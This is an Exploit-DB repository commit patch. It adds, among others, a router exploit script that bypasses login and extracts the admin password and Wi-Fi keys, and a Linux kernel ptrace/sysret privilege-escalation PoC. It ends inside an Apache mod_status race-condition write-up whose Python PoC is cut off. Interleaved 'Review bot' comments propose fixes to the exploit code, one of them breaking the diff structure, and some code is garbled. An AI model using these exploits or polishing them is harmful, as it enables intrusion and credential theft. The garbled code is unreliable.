From 2ea55e459e6bbf5d28ed678cf402c3c0b3a690cb Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 23 Jul 2014 04:39:44 +0000
Subject: [PATCH] Updated 07_23_2014
---
 files.csv | 15 +-
 platforms/hardware/webapps/34128.py | 81 ++++
 platforms/lin_amd64/local/34134.c | 125 ++++++
 platforms/linux/dos/34133.txt | 394 ++++++++++++++++++
 platforms/linux/remote/34026.py | 75 ++++
 platforms/linux/webapps/34130.rb | 572 ++++++++++++++++++++++++++
 platforms/php/remote/34132.txt | 128 ++++++
 platforms/php/webapps/34105.txt | 52 +++
 platforms/php/webapps/34124.txt | 25 ++
 platforms/win32/dos/34010.html | 113 +++++
 platforms/windows/dos/34129.txt | 55 +++
 platforms/windows/dos/34135.py | 122 ++++++
 platforms/windows/local/34112.txt | 206 ++++++++++
 platforms/windows/shellcode/33836.txt | 27 ++
 14 files changed, 1989 insertions(+), 1 deletion(-)
 create mode 100755 platforms/hardware/webapps/34128.py
 create mode 100755 platforms/lin_amd64/local/34134.c
 create mode 100755 platforms/linux/dos/34133.txt
 create mode 100755 platforms/linux/remote/34026.py
 create mode 100755 platforms/linux/webapps/34130.rb
 create mode 100755 platforms/php/remote/34132.txt
 create mode 100755 platforms/php/webapps/34105.txt
 create mode 100755 platforms/php/webapps/34124.txt
 create mode 100755 platforms/win32/dos/34010.html
 create mode 100755 platforms/windows/dos/34129.txt
 create mode 100755 platforms/windows/dos/34135.py
 create mode 100755 platforms/windows/local/34112.txt
 create mode 100755 platforms/windows/shellcode/33836.txt
diff --git a/files.csv b/files.csv
index 3f2759509..c3df5efb0 100755
--- a/files.csv
+++ b/files.csv
@@ -16855,7 +16855,7 @@ id,file,description,date,author,platform,type,port
 19521,platforms/windows/remote/19521.txt,"MS IE 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0
 19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
 19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution Vulnerability",2012-07-02,ShadowHatesYou,linux,local,0
-19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0
+19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0
 19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0
 19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal",2012-07-02,"Dillon Beresford",hardware,webapps,0
 19528,platforms/windows/local/19528.txt,"MS IE 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
@@ -30481,6 +30481,7 @@ id,file,description,date,author,platform,type,port
 33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
 33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
 33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
+33836,platforms/windows/shellcode/33836.txt,"Windows All Versions - Add Admin User Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0
 33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0
 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
 33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
@@ -30631,6 +30632,7 @@ id,file,description,date,author,platform,type,port
 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
 34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
 34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010
+34010,platforms/win32/dos/34010.html,"Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0
 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP 'search.php' Cross Site Scripting Vulnerability",2010-05-19,"Andrea Bocchetti",php,webapps,0
 34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 'resin-admin/digest.php' Multiple Cross Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0
 34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 'systemWebAdminConfig.do' Remote Security Bypass Vulnerability",2010-05-19,"Nahuel Grisolia",windows,remote,0
@@ -30644,6 +30646,7 @@ id,file,description,date,author,platform,type,port
 34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 'id' Parameter Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-20,"High-Tech Bridge SA",php,webapps,0
 34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross Site Scripting Vulnerability",2010-01-15,"ViRuSMaN ",php,webapps,0
 34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
+34026,platforms/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC",2014-07-10,EccE,linux,remote,0
 34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
 34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
 34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0
@@ -30709,12 +30712,14 @@ id,file,description,date,author,platform,type,port
 34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80
 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80
 34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent XSS Vulnerability",2014-07-18,Vulnerability-Lab,cgi,webapps,3378
+34105,platforms/php/webapps/34105.txt,"Wordpress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80
 34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Include Vulnerability",2010-06-07,"AnTi SeCuRe",php,webapps,0
 34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 'key' Parameter Cross Site Scripting Vulnerability",2010-06-07,"High-Tech Bridge SA",php,webapps,0
 34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 'url' Parameter Cross Site Scripting Vulnerability",2009-01-08,"Patrick Webster",java,webapps,0
 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0
 34110,platforms/php/webapps/34110.txt,"PG Auto Pro SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-09,Sid3^effects,php,webapps,0
 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection Vulnerabilities",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0
+34112,platforms/windows/local/34112.txt,"Microsoft XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0
 34113,platforms/php/webapps/34113.py,"SilverStripe CMS 2.4 File Renaming Security Bypass Vulnerability",2010-06-09,"John Leitch",php,webapps,0
 34114,platforms/php/webapps/34114.txt,"Joomla! 
JReservation Component Cross Site Scripting Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 'page' Parameter Cross Site Scripting Vulnerability",2010-06-07,"Adam Baldwin",windows,remote,0 
@@ -30724,5 +30729,13 @@ id,file,description,date,author,platform,type,port
 34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
 34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0
 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 'search.php' Cross Site Scripting Vulnerability",2010-01-18,indoushka,php,webapps,0
+34124,platforms/php/webapps/34124.txt,"Wordpress WP BackupPlus - Database And Files Backup Download (0day)",2014-07-20,pSyCh0_3D,php,webapps,0
 34126,platforms/windows/remote/34126.txt,"Microsoft Help and Support Center 'sysinfo/sysinfomain.htm' Cross Site Scripting Weakness",2010-06-10,"Tavis Ormandy",windows,remote,0
 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 'members.php' SQL Injection Vulnerability",2010-06-10,SwEET-DeViL,php,webapps,0
+34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
+34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
+34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80
+34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443
+34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
+34134,platforms/lin_amd64/local/34134.c,"Linux Kernel ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
+34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
diff --git a/platforms/hardware/webapps/34128.py b/platforms/hardware/webapps/34128.py
new file mode 100755
index 000000000..51a69e1f2
--- /dev/null
+++ b/platforms/hardware/webapps/34128.py
@@ -0,0 +1,81 @@
+#Author: Ajin Abraham - xboz
+#http://opensecurity.in
+#Product MTS MBlaze 3G Wi-Fi Modem
+#System Version 107
+#Manufacturer ZTE
+#Model AC3633
+import requests
+import os
+import urllib2
+print "MTS MBlaze Ultra Wi-Fi / ZTE AC3633 Exploit"
+print "Vulnerabilities"
+print "Login Bypass | Router Credential Stealing | Wi-Fi Password Stealing | CSRF | Reset Password without old password and Session\n"
+url='http://192.168.1.1'
+def find_between( s, first, last ):
+ try:
+ start = s.index( first ) + len( first )
+ end = s.index( last, start )
+ return s[start:end]
+ except ValueError:
+ return ""
+#Vulnerable Static Cookies
+cookies = dict(iusername='logined')
+#Login Bypass
+login_url = url+'/en/index.asp'
+print "\nAttempting Login :"+url
+print '================='
+try:
+ response=urllib2.urlopen(url,timeout=1)
+except:
+ print "Cannot Reach : "+url
+ exit
+r = requests.get(login_url, cookies=cookies)
+print 'Status : ' + str(r.status_code)
+if "3g.asp" in r.text:
+ print "Login Sucessfull!"
+#Information Gathering
+print "\nInformation"
+print "========="
+info_url=url+'/en/3g.asp'
+i= requests.get(info_url, cookies=cookies)
+ip=find_between(i.text,'"g3_ip" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','">')
+subnet =find_between(i.text,'"g3_mask" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','">')
+gateway=find_between(i.text,'"g3_gw" disabled="disabled" style="background:#ccc;" size="16" maxlength="15" value="','">')
+print "IP : " +ip
+print "Subnet : "+subnet
+print "Gateway : " +gateway
+#Steal Login Password
+print "\nStealing Router Login Credentials"
+print "======================"
+login_pwd_url=url+'/en/password.asp'
+p = requests.get(login_pwd_url, cookies=cookies)
+print 'Status : ' + str(p.status_code)
+print 'Username : admin' #default
+passwd=find_between(p.text,'id="sys_password" value="','"/>')
+print 'Password : '+ passwd
+print '\nExtracting WPA/WPA2 PSK Key'
+print '================='
+#Wi-Fi Password Extraction
+wifi_pass_url=url+'/en/wifi_security.asp'
+s = requests.get(wifi_pass_url, cookies=cookies)
+print 'Status: ' + str(s.status_code)
+wpa=find_between(s.text,"wpa_psk_key]').val('","');")
+wep=find_between(s.text,"wep_key]').val('","');")
+print "WPA/WPA2 PSK : " + wpa
+print "WEP Key : " + wep
+
+print "\nOther Vulnerabilities"
+print "======================="
+print "\n1.Cross Site Request Forgery in:\n\nhttp://192.168.1.1/en/dhcp_reservation.asp\nhttp://192.168.1.1/en/mac_filter.asp \nhttp://192.168.1.1/en/password.asp"
+print "\n2.Password Reset without old password and Session"
+print """
+POST /goform/formSyWebCfg HTTP/1.1
+Host: 192.168.1.1
+Content-Type: application/x-www-form-urlencoded
+Referer: http://192.168.1.1/en/password.asp
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: en-US,en;q=0.8,es;q=0.6,ms;q=0.4
+Content-Length: 52
+
+action=Apply&sys_cfg=changed&sys_password=mblazetestpassword
+"""
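Review bot: The `exit` in the `except:` branch of the reachability check is a bare name, not a call, so an unreachable `url` prints "Cannot Reach" and then falls straight into `requests.get`; it should read `exit(1)` (or `sys.exit(1)`), and the bare `except:` should be at least `except Exception:` so an interrupt is not swallowed. The header block lacks the Date, Vendor Homepage and Tested-on fields that the sibling entry 34026.py in this same commit carries, which makes the affected firmware (only "System Version 107" is given) hard to cross-check later; `import os` is also unused. The comment `#Vulnerable Static Cookies` names the finding only obliquely; it could state the root cause the script's success check on `"3g.asp" in r.text` relies on, e.g. `# the device appears to accept the fixed cookie iusername=logined as proof of login with no server-side session state`, which is the defect a vendor fix has to address.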
diff --git a/platforms/lin_amd64/local/34134.c b/platforms/lin_amd64/local/34134.c
new file mode 100755
index 000000000..539ba5723
--- /dev/null
+++ b/platforms/lin_amd64/local/34134.c
@@ -0,0 +1,125 @@
+/**
+ * CVE-2014-4699 ptrace/sysret PoC
+ * by Vitaly Nikolenko
+ * vnik@hashcrack.org
+ *
+ * > gcc -O2 poc_v0.c
+ *
+ * This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the
+ * following will trigger the #GP in sysret and overwrite the #PF handler so we
+ * can land to our NOP sled mapped at 0x80000000.
+ * However, once landed, the IDT will be trashed. We can either attempt to
+ * restore it (then escalate privileges and execute our shellcode) or find
+ * something else to overwrite that would transfer exec flow to our controlled
+ * user-space address. Since 3.10.something, IDT is read-only anyway. If you
+ * have any ideas, let me know.
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define SIZE 0x10000000
+
+typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
+
+unsigned long __user_cs;
+unsigned long __user_ss;
+unsigned long __user_rflags;
+
+void __attribute__((regparm(3))) payload() {
+ uint32_t *fixptr = (void*)0xffffffff81dd70e8;
+ // restore the #PF handler
+ *fixptr = -1;
+ //commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630;
+ //prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0;
+ //commit_creds(prepare_kernel_cred((uint64_t)NULL));
+
+ //__asm__ volatile ("swapgs\n\t"
+ // "...");
+}
+
+int main() {
+ struct user_regs_struct regs;
+ uint8_t *trampoline, *tmp;
+ int status;
+
+ struct {
+ uint16_t limit;
+ uint64_t addr;
+ } __attribute__((packed)) idt;
+
+ // MAP_POPULATE so we don't trigger extra #PF
+ trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);
+ assert(trampoline == 0x80000000);
+ memset(trampoline, 0x90, SIZE);
+ tmp = trampoline;
+ tmp += SIZE-1024;
+ memcpy(tmp, &payload, 1024);
+ memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
+
+ pid_t chld;
+
+ if ((chld = fork()) < 0) {
+ perror("fork");
+ exit(1);
+ }
+
+ if (chld == 0) {
+ if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
+ perror("PTRACE_TRACEME");
+ exit(1);
+ }
+ raise(SIGSTOP);
+ fork();
+ return 0;
+ }
+
+ asm volatile("sidt %0" : "=m" (idt));
+ printf("IDT addr = 0x%lx\n", idt.addr);
+
+ waitpid(chld, &status, 0);
+
+ ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK);
+
+ ptrace(PTRACE_CONT, chld, 0, 0);
+
+ waitpid(chld, &status, 0);
+
+ ptrace(PTRACE_GETREGS, chld, NULL, ®s);
+ regs.rdi = 0x0000000000000000;
+ regs.rip = 0x8fffffffffffffff;
+ regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78;
+
+ // attempt to restore the IDT
+ regs.rdi = 0x0000000000000000;
+ regs.rsi = 0x81658e000010cbd0;
+ regs.rdx = 0x00000000ffffffff;
+ regs.rcx = 0x81658e000010cba0;
+ regs.rax = 0x00000000ffffffff;
+ regs.r8 = 0x81658e010010cb00;
+ regs.r9 = 0x00000000ffffffff;
+ regs.r10 = 0x81668e0000106b10;
+ regs.r11 = 0x00000000ffffffff;
+ regs.rbx = 0x81668e0000106ac0;
+ regs.rbp = 0x00000000ffffffff;
+ regs.r12 = 0x81668e0000106ac0;
+ regs.r13 = 0x00000000ffffffff;
+ regs.r14 = 0x81668e0200106a90;
+ regs.r15 = 0x00000000ffffffff;
+
+ ptrace(PTRACE_SETREGS, chld, NULL, ®s);
+
+ ptrace(PTRACE_CONT, chld, 0, 0);
+
+ ptrace(PTRACE_DETACH, chld, 0, 0);
+}
diff --git a/platforms/linux/dos/34133.txt b/platforms/linux/dos/34133.txt
new file mode 100755
index 000000000..a8f548b9a
--- /dev/null
+++ b/platforms/linux/dos/34133.txt
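Review bot: The `mmap` call in `main` passes the integer `0x80000000` where a `void *` is expected and `assert(trampoline == 0x80000000)` compares a pointer with an integer — both are constraint violations that C11 compilers only report as warnings — and that `assert` is also the only check that the fixed mapping was obtained, so a `-DNDEBUG` build would `memset` through `MAP_FAILED`; write `trampoline = mmap((void *)0x80000000, SIZE, ...);` followed by `if (trampoline == MAP_FAILED) { perror("mmap"); exit(1); }`. `memcpy(tmp, &payload, 1024)` copies 1024 bytes from the address of `payload` regardless of the function's real size, reading past it into whatever follows in `.text` (undefined behaviour even where it happens to work), the return values of both `waitpid` calls and of `ptrace(PTRACE_SETOPTIONS/GETREGS/SETREGS/CONT)` are never checked, and `regs.rdi` is zeroed twice. The `#include` lines are empty in this rendering (and `&regs` appears as `®s`), so the header set cannot be verified from here. The header comment already says the code is kernel specific; it would help readers to state plainly that the hard-coded `0xffffffff81dd70e8` and the IDT-descriptor constants are taken from the one named Ubuntu kernel, so the program is not mistaken for a general test of whether a host is affected by CVE-2014-4699.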
@@ -0,0 +1,394 @@ +--[ 0. Sparse summary +Race condition between updating httpd's "scoreboard" and mod_status, +leading to several critical scenarios like heap buffer overflow with +user +supplied payload and leaking heap which can leak critical memory +containing +htaccess credentials, ssl certificates private keys and so on. +--[ 1. Prerequisites + +Apache httpd compiled with MPM event or MPM worker. +The tested version was 2.4.7 compiled with: + + ./configure --enable-mods-shared=reallyall --with-included-apr + +The tested mod_status configuration in httpd.conf was: + SetHandler server-status + ExtendedStatus On +--[ 2. Race Condition + +Function ap_escape_logitem in server/util.c looks as follows: + + 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char +*str) + 1909{ + 1910 char *ret; + 1911 unsigned char *d; + 1912 const unsigned char *s; + 1913 apr_size_t length, escapes = 0; + 1914 + 1915 if (!str) { + 1916 return NULL; + 1917 } + 1918 + 1919 /* Compute how many characters need to be escaped */ + 1920 s = (const unsigned char *)str; + 1921 for (; *s; ++s) { + 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) { + 1923 escapes++; + 1924 } + 1925 } + 1926 + 1927 /* Compute the length of the input string, including NULL +*/ + 1928 length = s - (const unsigned char *)str + 1; + 1929 + 1930 /* Fast path: nothing to escape */ + 1931 if (escapes == 0) { + 1932 return apr_pmemdup(p, str, length); + 1933 } + +In the for-loop between 1921 and 1925 lines function is computing the +length of +supplied str (almost like strlen, but additionally it counts special +characters +which need to be escaped). As comment in 1927 value says, function +computes count +of bytes to copy. If there's nothing to escape function uses +apr_pmemdup to duplicate +the str. In our single-threaded mind everything looks good, but tricky +part starts +when we introduce multi-threading. 
Apache in MPM mode runs workers as +threads, let's +consider the following scenario: + + 1) ap_escape_logitem(pool, "") is called + 2) for-loop in 1921 line immediately escapes, because *s is in +first loop run + 3) malicious thread change memory under *s to another value +(something which is not ) + 4) apr_pmemdup copies that change value to new string and returns +it + +Output from the ap_escape_logitem is considered to be a string, if +scenario above would occur, +then returned string would not be zeroed at the end, which may be +harmful. The mod_status +code looks as follows: + + 833 ap_rprintf(r, "%s%s" + 834 "%snn", + 835 ap_escape_html(r->pool, + 836 +ws_record->client), + 837 ap_escape_html(r->pool, + 838 +ws_record->vhost), + 839 ap_escape_html(r->pool, + 840 +ap_escape_logitem(r->pool, + 841 +ws_record->request))); + +The relevant call to ap_escape_html() is at line 839 after the +evaluation of ap_escape_logitem(). +The first argument passed to the ap_escape_logitem() is in fact an apr +pool associated with +the HTTP request and defined in the request_rec structure. + +This code is a part of a larger for-loop where code is iterating over +worker_score structs which is +defined as follows: + + 90struct worker_score { + 91#if APR_HAS_THREADS + 92 apr_os_thread_t tid; + 93#endif + 94 int thread_num; + 95 /* With some MPMs (e.g., worker), a worker_score can +represent + 96 * a thread in a terminating process which is no longer + 97 * represented by the corresponding process_score. These +MPMs + 98 * should set pid and generation fields in the worker_score. 
+ 99 */ + 100 pid_t pid; + 101 ap_generation_t generation; + 102 unsigned char status; + 103 unsigned short conn_count; + 104 apr_off_t conn_bytes; + 105 unsigned long access_count; + 106 apr_off_t bytes_served; + 107 unsigned long my_access_count; + 108 apr_off_t my_bytes_served; + 109 apr_time_t start_time; + 110 apr_time_t stop_time; + 111 apr_time_t last_used; + 112#ifdef HAVE_TIMES + 113 struct tms times; + 114#endif + 115 char client[40]; /* Keep 'em small... but large +enough to hold an IPv6 address */ + 116 char request[64]; /* We just want an idea... */ + 117 char vhost[32]; /* What virtual host is being +accessed? */ + 118}; + +The 'request' field in a worker_score structure is particularly +interesting - this field can be changed inside +the copy_request function, which is called by the +update_child_status_internal. This change may occur when the +mod_status is iterating over the workers at the same time the +ap_escape_logitem is called within a different +thread, leading to a race condition. We can trigger this exact +scenario in order to return a string without a +trailing . This can be achived by running two clients, one triggering +the mod_status handler and second +sending random requests to the web server. Let's consider the +following example: + + 1) the mod_status iterates over workers invoking +update_child_status_internal() + 2) at some point for one worker mod_status calls +ap_escape_logitem(pool, ws_record->request) + 3) let's asume that ws_record->request at the beginning is "" +literally at the first byte. + 4) inside the ap_escape_logitem function the length of the +ws_record->request is computed, which is 1 + (an empty string consisting of ) + 5) another thread modifies ws_record->request (in fact it's called +ws->request in update_child_status_internal + function but it's exactly the same location in memory) and puts +there i.e. 
"GET / HTTP/1.0" + 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the +first one byte from "GET / HTTP/1.0" - "G" in + that case and returns it. The ap_pmemdup looks as follows: + + 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void +*m, apr_size_t n) + 113{ + 114 void *res; + 115 + 116 if (m == NULL) + 117 return NULL; + 118 res = apr_palloc(a, n); + 119 memcpy(res, m, n); + 120 return res; + + It allocates memory using apr_palloc function which returns +"ditry" memory (note that apr_pcalloc overwrite + allocated memory with NULs). + + So it's non-deterministic what's after the copied "G" byte. +There might be or might be not. For now let's + assume that the memory allocated by apr_palloc was dirty +(containing random bytes). + 7) ap_escape_logitem returns "G....." .junk. "" + +The value from the example above is then pushed to the ap_escape_html2 +function which is also declared in util.c: + + 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char +*s, int toasc) + 1861{ + 1862 int i, j; + 1863 char *x; + 1864 + 1865 /* first, count the number of extra characters */ + 1866 for (i = 0, j = 0; s[i] != ''; i++) + 1867 if (s[i] == '') + 1868 j += 3; + 1869 else if (s[i] == '&') + 1870 j += 4; + 1871 else if (s[i] == '"') + 1872 j += 5; + 1873 else if (toasc && !apr_isascii(s[i])) + 1874 j += 5; + 1875 + 1876 if (j == 0) + 1877 return apr_pstrmemdup(p, s, i); + 1878 + 1879 x = apr_palloc(p, i + j + 1); + 1880 for (i = 0, j = 0; s[i] != ''; i++, j++) + 1881 if (s[i] == '') { + 1886 memcpy(&x[j], ">", 4); + 1887 j += 3; + 1888 } + 1889 else if (s[i] == '&') { + 1890 memcpy(&x[j], "&", 5); + 1891 j += 4; + 1892 } + 1893 else if (s[i] == '"') { + 1894 memcpy(&x[j], """, 6); + 1895 j += 5; + 1896 } + 1897 else if (toasc && !apr_isascii(s[i])) { + 1898 char *esc = apr_psprintf(p, "&#%3.3d;", (unsigned +char)s[i]); + 1899 memcpy(&x[j], esc, 6); + 1900 j += 5; + 1901 } + 1902 else + 1903 x[j] = s[i]; + 1904 + 1905 x[j] = ''; + 1906 return x; + 
1907} + +If the string from the example above would be passed to this function +we should get the following code-flow: + + 1) in the for-loop started in line 1866 we count the length of +escaped string + 2) because 's' string contains junk (due to only one byte being +allocated by the apr_palloc function), + it may contain '>' character. Let's assume that this is our +case + 3) after for-loop in 1866 line 'j' is greater than 0 (at least one +s[i] equals '>' as assumed above + 4) in the 1879 line memory for escaped 'd' string is allocated + 5) for-loop started in line 1880 copies string 's' to the escaped +'d' string BUT apr_palloc has allocated + only one byte for 's'. Thus, for each i > 0 the loop reads +random memory and copies that value + to 'd' string. At this point it's possible to trigger an +information leak vulnerability (see section 5). + +However the 's' string may overlap with 'd' i.e.: + + 's' is allocated under 0 with contents s = "AAAAAAAA>" + 'd' is allocated under 8 then s[8] = d[0]. + +If that would be the case, then for-loop would run forever (s[i] never +would be since it was overwritten in the loop +by non-zero). Forever... until it hits an unmapped memory or read only +area. 
+ +Part of the scoreboard.c code which may overwrite the +ws_record->request was discovered using a tsan: + + #1 ap_escape_logitem ??:0 (exe+0x0000000411f2) + #2 status_handler +/home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839 +(mod_status.so+0x0000000044b0) + #3 ap_run_handler ??:0 (exe+0x000000084d98) + #4 ap_invoke_handler ??:0 (exe+0x00000008606e) + #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9) + #6 ap_process_http_async_connection http_core.c:0 +(exe+0x0000000b143e) + #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) + #8 ap_run_process_connection ??:0 (exe+0x00000009d156) + #9 process_socket event.c:0 (exe+0x0000000cc65e) + #10 worker_thread event.c:0 (exe+0x0000000d0945) + #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) + #12 :0 (libtsan.so.0+0x00000001b279) + + Previous write of size 1 at 0x7feff2b862b8 by thread T2: + #0 update_child_status_internal scoreboard.c:0 +(exe+0x00000004d4c6) + #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693) + #2 ap_process_http_async_connection http_core.c:0 +(exe+0x0000000b139a) + #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f) + #4 ap_run_process_connection ??:0 (exe+0x00000009d156) + #5 process_socket event.c:0 (exe+0x0000000cc65e) + #6 worker_thread event.c:0 (exe+0x0000000d0945) + #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57) + #8 :0 (libtsan.so.0+0x00000001b279) +--[ 3. Consequences + +Race condition described in section 2, may lead to: + + - information leak in case when the string returned by +ap_escape_logitem is not at the end, + junk after copied bytes may be valuable + - overwriting heap with a user supplied value which may imply code +execution +--[ 4. 
Exploitation + + In order to exploit the heap overflow bug it's necessary to get +control over: + + 1) triggering the race-condition bug + 2) allocating 's' and 'd' strings in the ap_escape_html2 to overlap + 3) part of 's' which doesn't overlap with 'd' (this string is copied +over and over again) + 4) overwriting the heap in order to get total control over the cpu or +at least modify the + apache's handler code flow for our benefits +--[ 5. Information Disclosure Proof of Concept + + -- cut + #! /usr/bin/env python + + import httplib + import sys + import threading + import subprocess + import random + + def send_request(method, url): + try: + c = httplib.HTTPConnection('127.0.0.1', 80) + c.request(method,url); + if "foo" in url: + print c.getresponse().read() + c.close() + except Exception, e: + print e + pass + + def mod_status_thread(): + while True: + send_request("GET", "/foo?notables") + + def requests(): + evil = ''.join('A' for i in range(random.randint(0, 1024))) + while 